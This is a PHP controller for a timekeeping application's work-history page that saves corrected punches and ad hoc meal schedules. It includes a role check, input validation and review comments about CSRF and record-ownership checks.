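<?php
/**
 * workHx.php - work-history page controller.
 *
 * Flow, as visible in this file:
 *   1. Default the pay-period and team-member filters in $_POST.
 *   2. On submitBut == 'Save', either add/modify/delete a corrected punch
 *      (Punch_Cx) or add/modify an ad hoc schedule entry (Schedule_Ad_Hoc).
 *   3. Print queued alerts and, for non-staff sessions, load views/v_workHx.php.
 *
 * Every $_POST value here is client-controlled. Optional fields are read
 * through $workHxIn (null when absent) so a missing field cannot raise an
 * undefined-index warning that leaks paths into the page.
 *
 * NOTE(review): no anti-CSRF token is checked in this file; confirm that
 * includes/private_header.php validates one before state-changing POSTs.
 * NOTE(review): userID, punchID, punchcxID and ad_hoc_schedID are taken
 * from the request as-is; confirm that Punch_Cx and Schedule_Ad_Hoc verify
 * the session may edit those records and that they use bound parameters.
 * $Template is presumably created by one of the includes - confirm.
 */
include('ini.php');
include('includes/private_header.php');

// Filter defaults are written back into $_POST, as the original did
// (presumably the view reads them from there - confirm).
if (!isset($_POST['f_payPeriodNum'])) {
    $_POST['f_payPeriodNum'] = $_SESSION['ppNum'];
}
if (!isset($_POST['userID'])) {
    $_POST['userID'] = '';
}

// Snapshot optional request fields; absent fields become null, which is
// what the original expressions evaluated to (with a warning).
$workHxIn = array();
foreach (array(
    'submitBut', 'timeRadio', 'customTime', 'hr', 'min', 'ampm',
    'punchcxID', 'dateTS', 'whichPunch', 'jobAreaID',
    'start1', 'finish1', 'start2', 'finish2',
    'meal_min1', 'meal_min2', 'comment',
) as $workHxKey) {
    $workHxIn[$workHxKey] = isset($_POST[$workHxKey]) ? $_POST[$workHxKey] : null;
}
unset($workHxKey);

// Same role test the original applied to the view only. It is evaluated
// once so the write path below is held to the same rule as the page.
$workHxRole = isset($_SESSION['LIS']) ? $_SESSION['LIS'] : null;
$workHxLid = isset($_SESSION['LID']) ? $_SESSION['LID'] : null;
$workHxCanManage = ($workHxRole != 'staff' && $workHxLid > 0);

if ($_POST['f_payPeriodNum'] < 0 && $workHxIn['submitBut'] == 'Update Display') {
    $Template->set_alert('Please select a pay period');
} else if ($_POST['userID'] <= 0) {
    $Template->set_alert('Please select a team member', 'success');
}

if ($workHxIn['submitBut'] == 'Save') {
    if (!$workHxCanManage) {
        // The original ran the edits below for any session that got past
        // private_header.php, while showing the edit view only to
        // non-staff sessions. Refuse the write when the view would be
        // refused, so a hand-built POST cannot change punches.
        $Template->set_alert('ERROR: You are not permitted to edit work history', 'error');
    } else if (isset($_POST['punchID'])) {
        // ======= EDITING A PUNCH ========
        $Punch_Cx = new Punch_Cx;
        if (!isset($_POST['punchTime'])) {
            $_POST['punchTime'] = '';
        }

        $timeRadio = $workHxIn['timeRadio'];
        $hasCustomTime = ($workHxIn['customTime'] !== null && $workHxIn['customTime'] != '');

        if ($timeRadio !== null || $hasCustomTime) {
            $timeIsValid = true;

            if ($timeRadio == 'del') {
                $time = '';
            } else if ($timeRadio == 'custom') {
                // hr/min feed arithmetic and string concatenation, so accept
                // only one or two ASCII digits within clock range.
                $hr = $workHxIn['hr'];
                $min = $workHxIn['min'];
                $hrOk = is_string($hr) && preg_match('/^[0-9]{1,2}\z/', $hr) === 1 && (int) $hr <= 23;
                $minOk = is_string($min) && preg_match('/^[0-9]{1,2}\z/', $min) === 1 && (int) $min <= 59;

                if ($hrOk && $minOk) {
                    // NOTE(review): 12 AM is stored as "12mm", exactly as
                    // before; confirm whether midnight should be "00mm".
                    if ($workHxIn['ampm'] == 'PM' && $hr < 12) {
                        $time = ((int) $hr + 12) . $min;
                    } else {
                        $time = str_pad($hr, 2, "0", STR_PAD_LEFT) . $min;
                    }
                } else {
                    $timeIsValid = false;
                }
            } else {
                // NOTE(review): the radio value is passed on unchecked, as
                // in the original; its expected format is not visible here.
                $time = $timeRadio;
            }

            if (!$timeIsValid) {
                $Template->set_alert('ERROR: Invalid custom time', 'error');
            } else if ($workHxIn['punchcxID'] == '') {
                $Punch_Cx->add($_POST['punchID'], $_POST['userID'], $workHxIn['dateTS'], $time, $workHxIn['whichPunch'], $workHxIn['jobAreaID']);
            } else if ($workHxIn['punchcxID'] > 0) {
                if ($timeRadio == 'del') {
                    //=== delete corrected punch - revert to actual punch
                    if ($Punch_Cx->del($workHxIn['punchcxID'], $_POST['userID'], $workHxIn['dateTS'])) {
                        $Template->set_alert('Corrected punch deleted', 'success');
                    } else {
                        $Template->set_alert('ERROR: Corrected punch was not deleted', 'error');
                    }
                } else {
                    $Punch_Cx->modify($time, $workHxIn['punchcxID'], $_POST['userID'], $workHxIn['dateTS'], $workHxIn['jobAreaID']);
                }
            }
        }
    } else if (isset($_POST['ad_hoc_schedID'])) {
        //======= EDITING A MEAL (SCHEDULE)
        $Schedule_Ad_Hoc = new Schedule_Ad_Hoc();
        $Schedule_Ad_Hoc->add_mod(
            $_POST['ad_hoc_schedID'],
            $_POST['userID'],
            $workHxIn['start1'],
            $workHxIn['finish1'],
            $workHxIn['start2'],
            $workHxIn['finish2'],
            $workHxIn['meal_min1'],
            $workHxIn['meal_min2'],
            $workHxIn['dateTS'],
            $workHxIn['comment']
        );
    }
}

echo($Template->get_alerts());

//=========== SET VIEWS ==================
if ($workHxCanManage) {
    $Template->load('views/v_workHx.php');
}

include('includes/private_footer.php');
?>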